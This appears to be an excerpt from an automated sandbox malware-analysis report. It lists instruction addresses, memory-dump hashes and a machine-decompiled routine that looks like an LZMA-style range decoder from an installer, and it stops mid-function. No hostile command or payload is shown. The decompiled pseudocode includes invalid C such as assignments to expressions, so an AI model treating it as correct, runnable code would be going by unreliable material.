                                                                        0x004074a9
                                                                        0x004074ac
                                                                        0x004074af
                                                                        0x004074b3
                                                                        0x004074b6
                                                                        0x004074bc
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074c1
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004071c2
                                                                        0x004071c5
                                                                        0x004071fb
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732e
                                                                        0x0040732e
                                                                        0x00407331
                                                                        0x00407333
                                                                        0x004075bd
                                                                        0x00000000
                                                                        0x004075bd
                                                                        0x00407339
                                                                        0x0040733c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407342
                                                                        0x00407346
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00000000
                                                                        0x00407349
                                                                        0x004071c7
                                                                        0x004071c9
                                                                        0x004071cb
                                                                        0x004071cd
                                                                        0x004071d0
                                                                        0x004071d1
                                                                        0x004071d3
                                                                        0x004071d5
                                                                        0x004071d8
                                                                        0x004071db
                                                                        0x004071f1
                                                                        0x004071f6
                                                                        0x0040722e
                                                                        0x0040722e
                                                                        0x00407232
                                                                        0x0040725e
                                                                        0x00407260
                                                                        0x00407267
                                                                        0x0040726a
                                                                        0x0040726d
                                                                        0x0040726d
                                                                        0x00407272
                                                                        0x00407272
                                                                        0x00407274
                                                                        0x00407277
                                                                        0x0040727e
                                                                        0x00407281
                                                                        0x004072ae
                                                                        0x004072ae
                                                                        0x004072b1
                                                                        0x004072b4
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00000000
                                                                        0x00407328
                                                                        0x004072b6
                                                                        0x004072bc
                                                                        0x004072bf
                                                                        0x004072c2
                                                                        0x004072c5
                                                                        0x004072c8
                                                                        0x004072cb
                                                                        0x004072ce
                                                                        0x004072d1
                                                                        0x004072d4
                                                                        0x004072d7
                                                                        0x004072f0
                                                                        0x004072f2
                                                                        0x004072f5
                                                                        0x004072f6
                                                                        0x004072f9
                                                                        0x004072fb
                                                                        0x004072fe
                                                                        0x00407300
                                                                        0x00407302
                                                                        0x00407305
                                                                        0x00407307
                                                                        0x0040730a
                                                                        0x0040730e
                                                                        0x00407310
                                                                        0x00407310
                                                                        0x00407311
                                                                        0x00407314
                                                                        0x00407317
                                                                        0x004072d9
                                                                        0x004072d9
                                                                        0x004072e1
                                                                        0x004072e6
                                                                        0x004072e8
                                                                        0x004072eb
                                                                        0x004072eb
                                                                        0x0040731a
                                                                        0x00407321
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00407321
                                                                        0x00407234
                                                                        0x00407237
                                                                        0x00407239
                                                                        0x0040723c
                                                                        0x0040723f
                                                                        0x00407242
                                                                        0x00407244
                                                                        0x00407247
                                                                        0x0040724a
                                                                        0x0040724a
                                                                        0x0040724d
                                                                        0x0040724d
                                                                        0x00407250
                                                                        0x00407257
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00407257
                                                                        0x004071dd
                                                                        0x004071e0
                                                                        0x004071e2
                                                                        0x004071e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f44
                                                                        0x00406f44
                                                                        0x00406f48
                                                                        0x0040758d
                                                                        0x00000000
                                                                        0x0040758d
                                                                        0x00406f4e
                                                                        0x00406f51
                                                                        0x00406f54
                                                                        0x00406f57
                                                                        0x00406f5a
                                                                        0x00406f5d
                                                                        0x00406f60
                                                                        0x00406f62
                                                                        0x00406f65
                                                                        0x00406f68
                                                                        0x00406f6b
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070cf
                                                                        0x004070cf
                                                                        0x004070d3
                                                                        0x00407599
                                                                        0x00000000
                                                                        0x00407599
                                                                        0x004070d9
                                                                        0x004070dc
                                                                        0x004070df
                                                                        0x004070e2
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e7
                                                                        0x004070ea
                                                                        0x004070ed
                                                                        0x004070f0
                                                                        0x004070f3
                                                                        0x004070f6
                                                                        0x004070f7
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070fc
                                                                        0x004070ff
                                                                        0x00407102
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407108
                                                                        0x0040710a
                                                                        0x0040710a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x00407350
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407356
                                                                        0x00407359
                                                                        0x0040735c
                                                                        0x0040735f
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407364
                                                                        0x00407367
                                                                        0x0040736a
                                                                        0x0040736d
                                                                        0x00407370
                                                                        0x00407373
                                                                        0x00407374
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407379
                                                                        0x0040737c
                                                                        0x0040737f
                                                                        0x00407382
                                                                        0x00407385
                                                                        0x00407389
                                                                        0x0040738b
                                                                        0x0040738e
                                                                        0x00000000
                                                                        0x00407390
                                                                        0x0040710d
                                                                        0x0040710d
                                                                        0x00000000
                                                                        0x0040710d
                                                                        0x0040738e
                                                                        0x004075c3
                                                                        0x004075e5
                                                                        0x004075eb
                                                                        0x004075ed
                                                                        0x004075f4
                                                                        0x004075f6
                                                                        0x004075fd
                                                                        0x00407601
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x004075fa
                                                                        0x004075fa
                                                                        0x00000000
                                                                        0x004075fa
                                                                        0x00407447
                                                                        0x004074cd
                                                                        0x004074d3
                                                                        0x004074d6
                                                                        0x004074d9
                                                                        0x004074dc
                                                                        0x004074df
                                                                        0x004074e2
                                                                        0x004074e5
                                                                        0x004074e8
                                                                        0x004074ee
                                                                        0x00407507
                                                                        0x0040750a
                                                                        0x0040750d
                                                                        0x00407510
                                                                        0x00407514
                                                                        0x00407516
                                                                        0x00407517
                                                                        0x0040751a
                                                                        0x004074f0
                                                                        0x004074f0
                                                                        0x004074f8
                                                                        0x004074fd
                                                                        0x004074ff
                                                                        0x00407502
                                                                        0x00407502
                                                                        0x00407524
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00407524
                                                                        0x00000000
                                                                        0x00407399

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                        • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                        • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                        • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E004070AB() {
                                                                        				unsigned short _t532;
                                                                        				signed int _t533;
                                                                        				void _t534;
                                                                        				void* _t535;
                                                                        				signed int _t536;
                                                                        				signed int _t565;
                                                                        				signed int _t568;
                                                                        				signed int _t589;
                                                                        				signed int* _t606;
                                                                        				void* _t613;
                                                                        
                                                                        				L0:
                                                                        				while(1) {
                                                                        					L0:
                                                                        					if( *(_t613 - 0x40) != 0) {
                                                                        						L89:
                                                                        						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                        						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                        						L69:
                                                                        						_t606 =  *(_t613 - 0x58);
                                                                        						 *(_t613 - 0x84) = 0x12;
                                                                        						L132:
                                                                        						 *(_t613 - 0x54) = _t606;
                                                                        						L133:
                                                                        						_t532 =  *_t606;
                                                                        						_t589 = _t532 & 0x0000ffff;
                                                                        						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                        						if( *(_t613 - 0xc) >= _t565) {
                                                                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                        							 *(_t613 - 0x40) = 1;
                                                                        							_t533 = _t532 - (_t532 >> 5);
                                                                        							 *_t606 = _t533;
                                                                        						} else {
                                                                        							 *(_t613 - 0x10) = _t565;
                                                                        							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                        							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                        						}
                                                                        						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                        							L139:
                                                                        							_t534 =  *(_t613 - 0x84);
                                                                        							L140:
                                                                        							 *(_t613 - 0x88) = _t534;
                                                                        							goto L1;
                                                                        						} else {
                                                                        							L137:
                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                        								 *(_t613 - 0x88) = 5;
                                                                        								goto L170;
                                                                        							}
                                                                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                        							goto L139;
                                                                        						}
                                                                        					} else {
                                                                        						if( *(__ebp - 0x60) == 0) {
                                                                        							L171:
                                                                        							_t536 = _t535 | 0xffffffff;
                                                                        							L172:
                                                                        							return _t536;
                                                                        						}
                                                                        						__eax = 0;
                                                                        						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                        						0 | _t258 = _t258 + _t258 + 9;
                                                                        						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                        						L75:
                                                                        						if( *(__ebp - 0x64) == 0) {
                                                                        							 *(__ebp - 0x88) = 0x1b;
                                                                        							L170:
                                                                        							_t568 = 0x22;
                                                                        							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                        							_t536 = 0;
                                                                        							goto L172;
                                                                        						}
                                                                        						__eax =  *(__ebp - 0x14);
                                                                        						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        						if(__eax >=  *(__ebp - 0x74)) {
                                                                        							__eax = __eax +  *(__ebp - 0x74);
                                                                        						}
                                                                        						__edx =  *(__ebp - 8);
                                                                        						__cl =  *(__eax + __edx);
                                                                        						__eax =  *(__ebp - 0x14);
                                                                        						 *(__ebp - 0x5c) = __cl;
                                                                        						 *(__eax + __edx) = __cl;
                                                                        						__eax = __eax + 1;
                                                                        						__edx = 0;
                                                                        						_t274 = __eax %  *(__ebp - 0x74);
                                                                        						__eax = __eax /  *(__ebp - 0x74);
                                                                        						__edx = _t274;
                                                                        						__eax =  *(__ebp - 0x68);
                                                                        						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        						_t283 = __ebp - 0x64;
                                                                        						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                        						 *( *(__ebp - 0x68)) = __cl;
                                                                        						L79:
                                                                        						 *(__ebp - 0x14) = __edx;
                                                                        						L80:
                                                                        						 *(__ebp - 0x88) = 2;
                                                                        					}
                                                                        					L1:
                                                                        					_t535 =  *(_t613 - 0x88);
                                                                        					if(_t535 > 0x1c) {
                                                                        						goto L171;
                                                                        					}
                                                                        					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                                        						case 0:
                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                        								goto L170;
                                                                        							}
                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                        							_t535 =  *( *(_t613 - 0x70));
                                                                        							if(_t535 > 0xe1) {
                                                                        								goto L171;
                                                                        							}
                                                                        							_t539 = _t535 & 0x000000ff;
                                                                        							_push(0x2d);
                                                                        							asm("cdq");
                                                                        							_pop(_t570);
                                                                        							_push(9);
                                                                        							_pop(_t571);
                                                                        							_t609 = _t539 / _t570;
                                                                        							_t541 = _t539 % _t570 & 0x000000ff;
                                                                        							asm("cdq");
                                                                        							_t604 = _t541 % _t571 & 0x000000ff;
                                                                        							 *(_t613 - 0x3c) = _t604;
                                                                        							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                        							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                        							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                        							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                        								L10:
                                                                        								if(_t612 == 0) {
                                                                        									L12:
                                                                        									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                        									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                        									goto L15;
                                                                        								} else {
                                                                        									goto L11;
                                                                        								}
                                                                        								do {
                                                                        									L11:
                                                                        									_t612 = _t612 - 1;
                                                                        									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                        								} while (_t612 != 0);
                                                                        								goto L12;
                                                                        							}
                                                                        							if( *(_t613 - 4) != 0) {
                                                                        								GlobalFree( *(_t613 - 4));
                                                                        							}
                                                                        							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                        							 *(_t613 - 4) = _t535;
                                                                        							if(_t535 == 0) {
                                                                        								goto L171;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                        								goto L10;
                                                                        							}
                                                                        						case 1:
                                                                        							L13:
                                                                        							__eflags =  *(_t613 - 0x6c);
                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                        								 *(_t613 - 0x88) = 1;
                                                                        								goto L170;
                                                                        							}
                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                        							_t45 = _t613 - 0x48;
                                                                        							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                        							__eflags =  *_t45;
                                                                        							L15:
                                                                        							if( *(_t613 - 0x48) < 4) {
                                                                        								goto L13;
                                                                        							}
                                                                        							_t547 =  *(_t613 - 0x40);
                                                                        							if(_t547 ==  *(_t613 - 0x74)) {
                                                                        								L20:
                                                                        								 *(_t613 - 0x48) = 5;
                                                                        								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                        								goto L23;
                                                                        							}
                                                                        							 *(_t613 - 0x74) = _t547;
                                                                        							if( *(_t613 - 8) != 0) {
                                                                        								GlobalFree( *(_t613 - 8));
                                                                        							}
                                                                        							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                        							 *(_t613 - 8) = _t535;
                                                                        							if(_t535 == 0) {
                                                                        								goto L171;
                                                                        							} else {
                                                                        								goto L20;
                                                                        							}
                                                                        						case 2:
                                                                        							L24:
                                                                        							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                        							 *(_t613 - 0x84) = 6;
                                                                        							 *(_t613 - 0x4c) = _t554;
                                                                        							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                        							goto L132;
                                                                        						case 3:
                                                                        							L21:
                                                                        							__eflags =  *(_t613 - 0x6c);
                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                        								 *(_t613 - 0x88) = 3;
                                                                        								goto L170;
                                                                        							}
                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        							_t67 = _t613 - 0x70;
                                                                        							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                        							__eflags =  *_t67;
                                                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                        							L23:
                                                                        							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                        							if( *(_t613 - 0x48) != 0) {
                                                                        								goto L21;
                                                                        							}
                                                                        							goto L24;
                                                                        						case 4:
                                                                        							goto L133;
                                                                        						case 5:
                                                                        							goto L137;
                                                                        						case 6:
                                                                        							__edx = 0;
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								__eax =  *(__ebp - 4);
                                                                        								__ecx =  *(__ebp - 0x38);
                                                                        								 *(__ebp - 0x34) = 1;
                                                                        								 *(__ebp - 0x84) = 7;
                                                                        								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                        								goto L132;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                        							__esi =  *(__ebp - 0x60);
                                                                        							__cl = 8;
                                                                        							__cl = 8 -  *(__ebp - 0x3c);
                                                                        							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                        							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                        							__ecx =  *(__ebp - 0x3c);
                                                                        							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                        							__ecx =  *(__ebp - 4);
                                                                        							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                        							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                        							__eflags =  *(__ebp - 0x38) - 4;
                                                                        							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        							if( *(__ebp - 0x38) >= 4) {
                                                                        								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                        								if( *(__ebp - 0x38) >= 0xa) {
                                                                        									_t98 = __ebp - 0x38;
                                                                        									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                        									__eflags =  *_t98;
                                                                        								} else {
                                                                        									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                        								}
                                                                        							} else {
                                                                        								 *(__ebp - 0x38) = 0;
                                                                        							}
                                                                        							__eflags =  *(__ebp - 0x34) - __edx;
                                                                        							if( *(__ebp - 0x34) == __edx) {
                                                                        								__ebx = 0;
                                                                        								__ebx = 1;
                                                                        								goto L61;
                                                                        							} else {
                                                                        								__eax =  *(__ebp - 0x14);
                                                                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        								__eflags = __eax -  *(__ebp - 0x74);
                                                                        								if(__eax >=  *(__ebp - 0x74)) {
                                                                        									__eax = __eax +  *(__ebp - 0x74);
                                                                        									__eflags = __eax;
                                                                        								}
                                                                        								__ecx =  *(__ebp - 8);
                                                                        								__ebx = 0;
                                                                        								__ebx = 1;
                                                                        								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                        								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                        								goto L41;
                                                                        							}
                                                                        						case 7:
                                                                        							__eflags =  *(__ebp - 0x40) - 1;
                                                                        							if( *(__ebp - 0x40) != 1) {
                                                                        								__eax =  *(__ebp - 0x24);
                                                                        								 *(__ebp - 0x80) = 0x16;
                                                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        								__eax =  *(__ebp - 0x28);
                                                                        								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        								__eax =  *(__ebp - 0x2c);
                                                                        								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        								__eax = 0;
                                                                        								__eflags =  *(__ebp - 0x38) - 7;
                                                                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        								__al = __al & 0x000000fd;
                                                                        								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                        								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                        								__eax =  *(__ebp - 4);
                                                                        								__eax =  *(__ebp - 4) + 0x664;
                                                                        								__eflags = __eax;
                                                                        								 *(__ebp - 0x58) = __eax;
                                                                        								goto L69;
                                                                        							}
                                                                        							__eax =  *(__ebp - 4);
                                                                        							__ecx =  *(__ebp - 0x38);
                                                                        							 *(__ebp - 0x84) = 8;
                                                                        							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                        							goto L132;
                                                                        						case 8:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								__eax =  *(__ebp - 4);
                                                                        								__ecx =  *(__ebp - 0x38);
                                                                        								 *(__ebp - 0x84) = 0xa;
                                                                        								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                        							} else {
                                                                        								__eax =  *(__ebp - 0x38);
                                                                        								__ecx =  *(__ebp - 4);
                                                                        								__eax =  *(__ebp - 0x38) + 0xf;
                                                                        								 *(__ebp - 0x84) = 9;
                                                                        								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                        								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                        							}
                                                                        							goto L132;
                                                                        						case 9:
                                                                        							goto L0;
                                                                        						case 0xa:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								__eax =  *(__ebp - 4);
                                                                        								__ecx =  *(__ebp - 0x38);
                                                                        								 *(__ebp - 0x84) = 0xb;
                                                                        								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                        								goto L132;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x28);
                                                                        							goto L88;
                                                                        						case 0xb:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								__ecx =  *(__ebp - 0x24);
                                                                        								__eax =  *(__ebp - 0x20);
                                                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        							} else {
                                                                        								__eax =  *(__ebp - 0x24);
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x28);
                                                                        							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        							L88:
                                                                        							__ecx =  *(__ebp - 0x2c);
                                                                        							 *(__ebp - 0x2c) = __eax;
                                                                        							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        							goto L89;
                                                                        						case 0xc:
                                                                        							L99:
                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                        								 *(__ebp - 0x88) = 0xc;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x70);
                                                                        							__eax =  *(__ebp - 0xc);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							_t334 = __ebp - 0x70;
                                                                        							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                        							__eflags =  *_t334;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							__eax =  *(__ebp - 0x2c);
                                                                        							goto L101;
                                                                        						case 0xd:
                                                                        							L37:
                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                        								 *(__ebp - 0x88) = 0xd;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x70);
                                                                        							__eax =  *(__ebp - 0xc);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							_t122 = __ebp - 0x70;
                                                                        							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                        							__eflags =  *_t122;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							L39:
                                                                        							__eax =  *(__ebp - 0x40);
                                                                        							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                        								goto L48;
                                                                        							}
                                                                        							__eflags = __ebx - 0x100;
                                                                        							if(__ebx >= 0x100) {
                                                                        								goto L54;
                                                                        							}
                                                                        							L41:
                                                                        							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                        							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                        							__ecx =  *(__ebp - 0x58);
                                                                        							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                        							 *(__ebp - 0x48) = __eax;
                                                                        							__eax = __eax + 1;
                                                                        							__eax = __eax << 8;
                                                                        							__eax = __eax + __ebx;
                                                                        							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        							__ax =  *__esi;
                                                                        							 *(__ebp - 0x54) = __esi;
                                                                        							__edx = __ax & 0x0000ffff;
                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        								__cx = __ax;
                                                                        								 *(__ebp - 0x40) = 1;
                                                                        								__cx = __ax >> 5;
                                                                        								__eflags = __eax;
                                                                        								__ebx = __ebx + __ebx + 1;
                                                                        								 *__esi = __ax;
                                                                        							} else {
                                                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                        								0x800 = 0x800 - __edx;
                                                                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                        								__ebx = __ebx + __ebx;
                                                                        								 *__esi = __cx;
                                                                        							}
                                                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        								goto L39;
                                                                        							} else {
